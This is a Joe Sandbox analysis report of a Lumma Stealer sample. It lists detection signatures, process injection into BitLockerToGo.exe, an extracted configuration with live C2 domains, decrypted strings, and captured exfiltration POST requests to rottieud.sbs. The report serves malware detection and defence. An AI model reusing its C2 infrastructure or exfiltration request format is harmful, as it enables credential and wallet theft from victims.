Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gFCeeWNTvZ.exe

Overview

General Information

Sample name:gFCeeWNTvZ.exe
renamed because original name is a hash value
Original sample name:49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d.exe
Analysis ID:1553058
MD5:f04f7352cba3579ff18e50534f6a14d4
SHA1:e5269c148e62f81a41cdc7144964046fdbd8fc4c
SHA256:49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d
Tags:exenotion-ramchhaya-comuser-JAMESWT_MHT
Infos:

Detection

LummaC, MicroClip
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected MicroClip
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • gFCeeWNTvZ.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\gFCeeWNTvZ.exe" MD5: F04F7352CBA3579FF18E50534F6A14D4)
    • BitLockerToGo.exe (PID: 7812 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rottieud.sbs", "thinkyyokej.sbs", "repostebhu.sbs", "ducksringjk.sbs", "tamedgeesy.sbs", "brownieyuz.sbs", "explainvees.sbs", "relalingj.sbs"], "Build id": "eSaxAu--webex"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000003.1891820407.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-10T09:27:19.114331+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449730TCP
              2024-11-10T09:27:59.304154+010020229301A Network Trojan was detected20.109.210.53443192.168.2.462527TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-10T09:27:20.119008+010020283713Unknown Traffic192.168.2.449734104.21.73.211443TCP
              2024-11-10T09:27:21.493404+010020283713Unknown Traffic192.168.2.449736104.21.73.211443TCP
              2024-11-10T09:27:22.855660+010020283713Unknown Traffic192.168.2.462520104.21.73.211443TCP
              2024-11-10T09:27:24.216426+010020283713Unknown Traffic192.168.2.462521104.21.73.211443TCP
              2024-11-10T09:27:25.592113+010020283713Unknown Traffic192.168.2.462522104.21.73.211443TCP
              2024-11-10T09:27:27.143991+010020283713Unknown Traffic192.168.2.462523104.21.73.211443TCP
              2024-11-10T09:27:28.980255+010020283713Unknown Traffic192.168.2.462524104.21.73.211443TCP
              2024-11-10T09:27:31.429815+010020283713Unknown Traffic192.168.2.462525104.21.73.211443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-10T09:27:20.798754+010020546531A Network Trojan was detected192.168.2.449734104.21.73.211443TCP
              2024-11-10T09:27:21.995787+010020546531A Network Trojan was detected192.168.2.449736104.21.73.211443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-10T09:27:20.798754+010020498361A Network Trojan was detected192.168.2.449734104.21.73.211443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-10T09:27:21.995787+010020498121A Network Trojan was detected192.168.2.449736104.21.73.211443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-10T09:27:27.877172+010020480941Malware Command and Control Activity Detected192.168.2.462523104.21.73.211443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://rottieud.sbs/apixAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/apiDUvAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/apiAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/apid1Avira URL Cloud: Label: malware
              Source: https://rottieud.sbs/ckzAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/apipfAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/gAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/&Avira URL Cloud: Label: malware
              Source: https://rottieud.sbs/apiaHDAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/hAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/Avira URL Cloud: Label: malware
              Source: https://rottieud.sbs:443/apitPdAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/apiesAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/1Avira URL Cloud: Label: malware
              Source: https://rottieud.sbs/-Avira URL Cloud: Label: malware
              Source: https://rottieud.sbs/apiliAvira URL Cloud: Label: malware
              Source: https://rottieud.sbs/zAvira URL Cloud: Label: malware
              Source: 0.2.gFCeeWNTvZ.exe.12b4a000.3.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["rottieud.sbs", "thinkyyokej.sbs", "repostebhu.sbs", "ducksringjk.sbs", "tamedgeesy.sbs", "brownieyuz.sbs", "explainvees.sbs", "relalingj.sbs"], "Build id": "eSaxAu--webex"}
              Source: https://rottieud.sbs/apiVirustotal: Detection: 6%Perma Link
              Source: gFCeeWNTvZ.exeVirustotal: Detection: 11%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: tamedgeesy.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: relalingj.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: rottieud.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: brownieyuz.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: explainvees.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: ducksringjk.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: thinkyyokej.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: repostebhu.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: rottieud.sbs
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmpString decryptor: eSaxAu--webex
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0053453C CryptUnprotectData,2_2_0053453C
              Source: gFCeeWNTvZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62520 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62521 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62522 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62523 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62524 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62525 version: TLS 1.2
              Source: gFCeeWNTvZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], bl2_2_0052D100
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h2_2_0053B390
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-456340F9h]2_2_005553B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax2_2_00545423
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+04h], eax2_2_00545423
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000000C6h]2_2_0052D768
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-000000DDh]2_2_00552880
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx2_2_00558B37
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], A489A0F1h2_2_00558B37
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+134B584Bh]2_2_0055CCE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-1AB836FBh]2_2_0052CD3E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-4Ch]2_2_00536F52
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi2_2_00543013
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-456340F5h]2_2_00556090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-456340F5h]2_2_00556090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_005441E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push eax2_2_005581BF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push ebx2_2_0053524F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx2_2_00559270
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp esi2_2_0053D231
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx-01h]2_2_00539290
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+7BDB4716h]2_2_00542350
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+04h]2_2_00542350
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_0053F337
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+66A5633Eh]2_2_0055A320
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000E2h]2_2_0055A320
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_005473D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0052E3C4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx2_2_0052B3A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dh, byte ptr [edi+ecx]2_2_00537437
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-4F06D217h]2_2_00537437
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add edx, ebp2_2_005294F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0052E482
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_0053C480
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_0053B4B7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push 00000000h2_2_0052C577
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, word ptr [ecx]2_2_005335E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00538670
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp al, 5Ch2_2_00522660
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+743244FFh]2_2_0053C6E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h2_2_0053F710
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, edi2_2_00529720
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx2_2_0055B722
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [edx+ecx]2_2_005347D1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h2_2_0053F7D8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx]2_2_00559830
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, ebx2_2_00543886
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00533960
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-15AA694Ah]2_2_0052B98C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_00542A70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]2_2_00559A30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], cx2_2_00533ABF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+537D72CBh]2_2_00557B08
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h2_2_00534BD2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, ecx2_2_0053DC5A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0054FC10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax+02h]2_2_00553C0F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp al, 2Eh2_2_00540C99
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000268h]2_2_0052CCBB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00543CA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax2_2_00527D70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]2_2_00527D70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, eax2_2_00542D77
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax2_2_00545DD8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+04h], eax2_2_00545DD8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0052BE63
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx edi, byte ptr [ebx]2_2_00559E30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0052BE81
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax2_2_00545423
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+04h], eax2_2_00545423
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_00536F47
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00521F10

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:62523 -> 104.21.73.211:443
              Source: Malware configuration extractorURLs: rottieud.sbs
              Source: Malware configuration extractorURLs: thinkyyokej.sbs
              Source: Malware configuration extractorURLs: repostebhu.sbs
              Source: Malware configuration extractorURLs: ducksringjk.sbs
              Source: Malware configuration extractorURLs: tamedgeesy.sbs
              Source: Malware configuration extractorURLs: brownieyuz.sbs
              Source: Malware configuration extractorURLs: explainvees.sbs
              Source: Malware configuration extractorURLs: relalingj.sbs
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62525 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62520 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62521 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62522 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62523 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62524 -> 104.21.73.211:443
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:62527
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rottieud.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: rottieud.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7VW3YXLZA66F9EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18139Host: rottieud.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MZVX4FV38R3YLXIAE5QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8790Host: rottieud.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9XOYRA8F42FOFMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20413Host: rottieud.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OPDDOUELN5HDDDXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: rottieud.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SYJ2CVSRLDMALM7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573629Host: rottieud.sbs
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: rottieud.sbs
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rottieud.sbs
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
